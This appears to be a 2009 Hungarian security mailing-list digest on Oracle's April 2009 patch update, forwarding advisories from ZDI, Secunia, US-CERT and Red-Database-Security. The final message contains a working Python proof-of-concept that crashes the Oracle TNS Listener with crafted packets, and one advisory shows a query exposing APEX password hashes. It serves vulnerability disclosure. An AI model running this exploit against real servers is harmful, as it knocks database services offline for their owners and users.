[guru] Oracle biztonsagi frissitesek
DATE: Wed, 29 Apr 2009 22:38:57 +0200
Oracle DB termékcsalád:
-----------------------
SQL injection hibát találtak a DBMS_AQIN és DBMS_AQADM_SYS csomagokban.
Az Application Express jelszó hash-ekhez tetszőleges belépett felhasználó
hozzáférhet.
A TNS Listener DoS-olható.
Oracle Applications termékcsalád:
---------------------------------
Format string hibát találtak az Oracle Process Manager and Notification
(opmn) daemon HTTP szerverének POST URI kezelésében.
Oracle WebLogic termékcsalád:
-----------------------------
Amennyiben a kérést Apache, Sun vagy IIS veszi, akkor ott egy plugin-t
kell alkalmazni. A plugin a HTTP kérés feldolgozásakor heap overflow
hibát tartalmaz.
Az Apache plugin SSL certificate kezelése buffer overflow hibát tartalmaz.
--- Begin Message ---
ZDI-09-017: Oracle Applications Server 10g Format String Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-017
April 14, 2009
-- Affected Vendors:
Oracle
-- Affected Products:
Oracle Application Server
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5729.
For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Oracle Applications Server. Authentication
is not required to exploit this vulnerability.
The specific flaw exists within the Oracle Process Manager and
Notification (opmn) daemon which is an HTTP daemon listening on a TCP
port above 6000. The daemon fails to properly handle format string
tokens in the POST URI when logging to the file
$ORACLE_HOME/opmn/logs/opmn.log. Exploitation of this issue can result
in arbitrary code execution.
-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpua
pr2009.html
-- Disclosure Timeline:
2007-11-07 - Vulnerability reported to vendor
2009-04-14 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Joxean Koret
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
--- End Message ---
--- Begin Message ---
======================================================================
Secunia Research 15/04/2009
- Oracle BEA WebLogic Server Plug-ins Integer Overflow -
======================================================================
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
======================================================================
1) Affected Software
* Oracle BEA WebLogic Server Plug-ins version 1.0.1166189.
NOTE: Other versions may also be affected.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From Remote
======================================================================
3) Vendor's Description of Software
"... the world's best application server for building and deploying
enterprise applications and services ...".
Product Link:
http://www.oracle.com/technology/products/weblogic/index.html
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in the Oracle BEA
WebLogic Server plug-ins for web servers, which can be exploited by
malicious people to compromise a vulnerable system.
The Oracle BEA WebLogic Server can be configured to receive requests
via an Apache, Sun, or IIS web server. In this case, a plug-in is
installed in the Internet-facing web server that passes the request to
a WebLogic server. An integer overflow when parsing HTTP requests can
be exploited to cause a heap-based buffer overflow.
Successful exploitation may allow execution of arbitrary code.
======================================================================
5) Solution
Apply patches released by the vendor.
======================================================================
6) Time Table
01/03/2009 - Vendor notified.
06/03/2009 - Vendor response requesting more information.
06/03/2009 - Sent PoC to vendor.
10/03/2009 - Vendor confirms vulnerability.
12/03/2009 - Vendor requests more information.
15/03/2009 - Supplemental information sent to vendor.
17/03/2009 - Vendor confirms and provides preliminary patch.
15/04/2009 - Public disclosure.
======================================================================
7) Credits
Discovered by Dyon Balding, Secunia Research.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0189 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-22/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
--- End Message ---
--- Begin Message ---
======================================================================
Secunia Research 15/04/2009
- Oracle BEA WebLogic Server Plug-ins Certificate Buffer Overflow -
======================================================================
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
======================================================================
1) Affected Software
* Oracle BEA WebLogic Server Plug-ins version 1.0.1166189.
NOTE: Other versions may also be affected.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From Remote
======================================================================
3) Vendor's Description of Software
"... the world's best application server for building and deploying
enterprise applications and services ...".
Product Link:
http://www.oracle.com/technology/products/weblogic/index.html
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in the Oracle BEA
WebLogic Server plug-ins for web servers, which can be exploited by
malicious people to compromise a vulnerable system.
The Oracle BEA WebLogic Server can be configured to receive requests
via an Apache web server. In this case, a plug-in is installed in the
Internet-facing web server that passes the request to a WebLogic
server.
The Apache web server may be configured to accept SSL connections and
forward the request to the WebLogic server along with any SSL-related
information. If the SSL client supplies a certificate (and the Apache
server is configured to accept it), then the certificate is passed to
the WebLogic plug-in via an environment variable.
The vulnerability is caused by a boundary error when parsing
certificates and can be exploited to cause a stack-based buffer
overflow by supplying a specially crafted certificate.
Successful exploitation may allow execution of arbitrary code.
======================================================================
5) Solution
Apply patches released by the vendor.
======================================================================
6) Time Table
01/03/2009 - Vendor notified.
06/03/2009 - Vendor confirms vulnerability.
17/03/2009 - Vendor provides preliminary patch.
15/04/2009 - Public disclosure.
======================================================================
7) Credits
Discovered by Dyon Balding, Secunia Research.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0190 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-23/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA09-105A
Oracle Updates for Multiple Vulnerabilities
Original release date: April 15, 2009
Last revised: --
Source: US-CERT
Systems Affected
* Oracle Database 11g, version 11.1.0.6, 11.1.0.7
* Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4
* Oracle Database 10g, version 10.1.0.5
* Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV
* Oracle Application Server 10g Release 2 (10.1.2), version 10.1.2.3.0
* Oracle Outside In SDK HTML Export 8.2.2, 8.3.0
* Oracle XML Publisher 5.6.2, 10.1.3.2, 10.1.3.2.1
* Oracle BI Publisher 10.1.3.3.0 10.1.3.3.1, 10.1.3.3.2, 10.1.3.3.3, 10.1.3.4
* Oracle E-Business Suite Release 12, version 12.0.6
* Oracle E-Business Suite Release 11i, version 11.5.10.2
* PeopleSoft Enterprise PeopleTools versions: 8.49
* PeopleSoft Enterprise HRMS versions: 8.9 and 9.0
* Oracle WebLogic Server 10.3
* Oracle WebLogic Server 9.0 GA, 9.1 GA, 9.2 through 9.2 MP3
* Oracle WebLogic Server 8.1 through 8.1 SP6
* Oracle WebLogic Server 7.0 through 7.0 SP7
* Oracle WebLogic Portal 8.1 through 8.1 SP6
* Oracle Data Service Integrator 10.3.0 and Oracle AquaLogic Data Services Platform (formerly BEA ALDSP) 3.2, 3.0.1, 3.0
* Oracle JRockit (formerly BEA JRockit) R27.6.2 and earlier (JDK/JRE 6, 5, 1.4.2)
Overview
Oracle products and components are affected by multiple
vulnerabilities. The impacts of these vulnerabilities include
remote execution of arbitrary code, information disclosure, and
denial of service.
I. Description
The Oracle Critical Patch Update Advisory - April 2009 addresses 43
vulnerabilities in various Oracle products and components. The
document provides information about affected components, access and
authorization required for successful exploitation, and the impact
from the vulnerabilities on data confidentiality, integrity, and
availability.
Oracle has associated CVE identifiers with the vulnerabilities
addressed in this Critical Patch Update. If significant additional
details about vulnerabilities and remediation techniques become
available, we will update the Vulnerability Notes Database.
II. Impact
The impact of these vulnerabilities varies depending on the
product, component, and configuration of the system. Potential
consequences include the execution of arbitrary code or commands,
information disclosure, and denial of service. Vulnerable
components may be available to unauthenticated, remote attackers.
An attacker who compromises an Oracle database may be able to
access sensitive information.
III. Solution
Apply the appropriate patches or upgrade as specified in the Oracle
Critical Patch Update Advisory - April 2009. Note that this
document only lists newly corrected issues. Updates to patches for
previously known issues are not listed.
IV. References
* Oracle Critical Patch Update Advisory - April 2009 -
<http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html>
* Critical Patch Updates and Security Alerts -
<http://www.oracle.com/technology/deploy/security/alerts.htm>
* Map of Public Vulnerability to Advisory/Alert -
<http://www.oracle.com/technology/deploy/security/pdf/public_vuln_to_advisory_mapping.html>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA09-105A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA09-105A Feedback VU#955892" in
the subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2009 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
April 15, 2009: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
iQEVAwUBSeY3bnIHljM+H4irAQIWvAf/dUpbNet17XLIfzFwu5wwA5wNm0foqBk4
2PYNO2+ENjlLwT2Rn0dx3xu/C1aPGVxw53EI7doWJubO/W9K2WgOrTs8k7iF65Do
dsTWGPi36XzIh4KShJ8NVssNUUqSyyD1QvCXxtOOuKFXfGRRAZlYTGYgYl92QjXM
h6j8KKFHqvUdCg4+F+qB3TryswLk0/b2Si2+HW1cWGWpSryKfzIAZv5s2HfvW1Iy
11fssZkyR0lvalVs/YSmiO3fsZZ2yigVL5WOwTUGreWnjKH+k13ooror0x5sIcwU
bsfgxHssykStG+UbhxPW8Me6hrEyWkYJoziykWWo+5pCqbwGeqgSYw==
=kziE
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
Name SQL Injection in package DBMS_AQIN [CVE-2009-0992]
Systems Affected Oracle 10.1.0.5 - 11.1.0.7
Severity High Risk
Category SQL Injection
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
CVE CVE-2009-0992
Advisory 14 April 2009 (V 1.00)
Details:
The package DBMS_AQIN contains a SQL injection vulnerability in the procedure DEQ_EXEJOB.
Additional information is available in the following advisory.
Advisory:
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqin.html
Patch Information:
Apply the patches for Oracle CPU April 2009.
Verification:
Our Oracle database scanner Repscan was updated with the information from the Oracle
CPU April 2009 and can identify vulnerable databases.
More Information about Repscan can be found here:
http://www.sentrigo.com/repscan
History:
14-apr-2009 Oracle published CPU April 2009 [CVE-]
14-apr-2009 Advisory published
About Red-Database-Security:
Red-Database-Security is the leading company for Oracle security. Within the last
6 years we reported several hundred vulnerabilities to Oracle.
--
(c) 2009 by Red-Database-Security GmbH
http://www.red-database-security.com
--- End Message ---
--- Begin Message ---
Name SQL Injection in package DBMS_AQADM_SYS [CVE-2009-0977]
Systems Affected Oracle 9.2.0.8 - 10.2.0.3
Severity Medium Risk
Category SQL Injection
Vendor URL http://www.oracle.com/
Author Franz Hüll (fh at red-database-security.com)
CVE CVE-2009-0977
Advisory 14 April 2009 (V 1.00)
Details:
The package DBMS_AQADM_SYS contains a SQL injection vulnerability in the procedure
GRANT_TYPE_ACCESS.
Additional information is available in the following advisory.
Advisory:
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html
Patch Information:
Apply the patches for Oracle CPU April 2009.
Verification:
Our Oracle database scanner Repscan was updated with the information from the Oracle
CPU April 2009 and can identify vulnerable databases.
More Information about Repscan can be found here:
http://www.sentrigo.com/repscan
History:
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0977]
14-apr-2009 Advisory published
About Red-Database-Security:
Red-Database-Security is the leading company for Oracle security. Within the last
6 years we reported several hundred vulnerabilities to Oracle.
--
(c) 2009 by Red-Database-Security GmbH
http://www.red-database-security.com
--- End Message ---
--- Begin Message ---
Name Unprivileged DB users can see APEX password hashes
Systems Affected APEX 3.0 (optional component of 11.1.0.7 installation)
Severity High Risk
Category Password Disclosure
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
CVE CVE-2009-0981
Advisory 14 April 2009 (V 1.00)
Details:
Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.
SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS
USER_NAME WEB_PASSWORD2
----------------------------------------------------------------------
YURI 141FA790354FB6C72802FDEA86353F31
This password hash can be checked using a tool like Repscan.
Additional information is available in the following advisory.
Advisory:
http://www.red-database-security.com/advisory/apex_password_hashes.html
Patch Information:
Upgrade to Oracle APEX 3.2.
Verification:
Our Oracle database scanner Repscan was updated with the information from the Oracle
CPU April 2009 and can identify vulnerable databases.
More Information about Repscan can be found here:
http://www.sentrigo.com/repscan
History:
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published
About Red-Database-Security:
Red-Database-Security is the leading company for Oracle security. Within the last
6 years we reported several hundred vulnerabilities to Oracle.
--
(c) 2009 by Red-Database-Security GmbH
http://www.red-database-security.com
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi.
Oracle RDBMS CPUapr2009 came out.
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html
CVE-2009-0991 Listener vulnerability was discovered by me, and here is
attached PoC for it (Python code).
- --
My PGP public key: http://yurichev.com/dennis.yurichev.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkns7r4ACgkQ1YPmFmJG++NmCQCfUPIljnrwnXkGvBA7XtcjVyEx
9DYAoN6fr8DqMRRtYTneEF8IMBrZd7gp
=/VFv
-----END PGP SIGNATURE-----
# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process
# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)
# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied
# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>
# Fixed in CPUapr2009, CVE-2009-0991
# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html
from sys import *
from socket import *
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 1521))
sockobj.send(
"\x00\x68\x00\x00\x01\x00\x00\x00\x01\x3A\x01\x2C\x00\x00\x20\x00"
"\x7F\xFF\xC6\x0E\x00\x00\x01\x00\x00\x2E\x00\x3A\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x43\x4F\x4E\x4E\x45"
"\x43\x54\x5F\x44\x41\x54\x41\x3D\x28\x43\x4F\x4D\x4D\x41\x4E\x44"
"\x3D\x73\x65\x72\x76\x69\x63\x65\x5F\x72\x65\x67\x69\x73\x74\x65"
"\x72\x5F\x4E\x53\x47\x52\x29\x29")
data=sockobj.recv(102400)
sockobj.send(
"\x02\xde\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x02\xd4\x20\x08"
"\xff\x03\x01\x00\x12\x34\x34\x34\x34\x34\x78\x10\x10\x32\x10\x32"
"\x10\x32\x10\x32\x10\x32\x54\x76\x00\x78\x10\x32\x54\x76\x44\x00"
"\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\x70\xe4\xa5\x09\x90\x00"
"\x23\x00\x00\x00\x42\x45\x43\x37\x36\x43\x32\x43\x43\x31\x33\x36"
"\x2d\x35\x46\x39\x46\x2d\x45\x30\x33\x34\x2d\x30\x30\x30\x33\x42"
"\x41\x31\x33\x37\x34\x42\x33\x03\x00\x65\x00\x01\x00\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x64\x02\x00\x80\x05\x00\x00\x00\x00\x04"
"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00"
"\x00\x00\x84\xc3\xcc\x07\x01\x00\x00\x00\x84\x2f\xa6\x09\x00\x00"
"\x00\x00\x44\xa5\xa2\x09\x25\x98\x18\xe9\x28\x50\x4f\x28\xbb\xac"
"\x15\x56\x8e\x68\x1d\x6d\x05\x00\x00\x00\xfc\xa9\x36\x22\x0f\x00"
"\x00\x00\x60\x30\xa6\x09\x0a\x00\x00\x00\x64\x00\x00\x00\x00\x00"
"\x00\x00\xaa\x00\x00\x00\x00\x01\x00\x00\x17\x00\x00\x00\x78\xc3"
"\xcc\x07\x6f\x72\x63\x6c\x00\x28\x48\x4f\x53\x54\x3d\x77\x69\x6e"
"\x32\x30\x30\x33\x29\x00\x01\x00\x00\x00\x09\x00\x00\x00\x01\x00"
"\x00\x00\x50\xc5\x2f\x22\x02\x00\x00\x00\x34\xc5\x2f\x22\x00\x00"
"\x00\x00\x9c\xc5\xcc\x07\x6f\x72\x63\x6c\x5f\x58\x50\x54\x00\x09"
"\x00\x00\x00\x50\xc5\x2f\x22\x04\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x34\xc5\xcc\x07\x6f\x72\x63\x6c\x5f"
"\x58\x50\x54\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00"
"\x84\xc5\x2f\x22\x02\x00\x00\x00\x68\xc5\x2f\x22\x00\x00\x00\x00"
"\xa4\xa5\xa2\x09\x6f\x72\x63\x6c\x00\x05\x00\x00\x00\x84\xc5\x2f"
"\x22\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xfc\xc4\xcc\x07\x6f\x72\x63\x6c\x00\x01\x00\x00\x00\x10\x00"
"\x00\x00\x02\x00\x00\x00\xbc\xc3\xcc\x07\x00\x00\x00\x00\xb0\x2f"
"\xa6\x09\x00\x00\x00\x00\x00\x00\x00\x00\x89\xc0\xb1\xc3\x08\x1d"
"\x46\x6d\xb6\xcf\xd1\xdd\x2c\xa7\x66\x6d\x0a\x00\x00\x00\x78\x2b"
"\xbc\x04\x7f\x00\x00\x00\x64\xa7\xa2\x09\x0d\x00\x00\x00\x20\x2c"
"\xbc\x04\x11\x00\x00\x00\x95\x00\x00\x00\x02\x20\x00\x80\x03\x00"
"\x00\x00\x98\xc5\x2f\x22\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00"
"\x00\x00\xb0\xc3\xcc\x07\x44\x45\x44\x49\x43\x41\x54\x45\x44\x00"
"\x28\x41\x44\x44\x52\x45\x53\x53\x3d\x28\x50\x52\x4f\x54\x4f\x43"
"\x4f\x4c\x3d\x42\x45\x51\x29\x28\x50\x52\x4f\x47\x52\x41\x4d\x3d"
"\x43\x3a\x5c\x61\x70\x70\x5c\x41\x64\x6d\x69\x6e\x69\x73\x74\x72"
"\x61\x74\x6f\x72\x5c\x70\x72\x6f\x64\x75\x63\x74\x5c\x31\x31\x2e"
"\x31\x2e\x30\x5c\x64\x62\x5f\x31\x5c\x62\x69\x6e\x5c\x6f\x72\x61"
"\x63\x6c\x65\x2e\x65\x78\x65\x29\x28\x41\x52\x47\x56\x30\x3d\x6f"
"\x72\x61\x63\x6c\x65\x6f\x72\x63\x6c\x29\x28\x41\x52\x47\x53\x3d"
"\x27\x28\x4c\x4f\x43\x41\x4c\x3d\x4e\x4f\x29\x27\x29\x29\x00\x4c"
"\x4f\x43\x41\x4c\x20\x53\x45\x52\x56\x45\x52\x00\x68\xc5\x2f\x22"
"\x34\xc5\x2f\x22\x00\x00\x00\x00\x05\x00\x00\x00\x84\xc5\x2f\x22"
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xfc\xc4\xcc\x07\x6f\x72\x63\x6c\x00\x09\x00\x00\x00\x50\xc5\x2f"
"\x22\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x34\xc5\xcc\x07\x6f\x72\x63\x6c\x5f\x58\x50\x54\x00"
)
sockobj.close()
--- End Message ---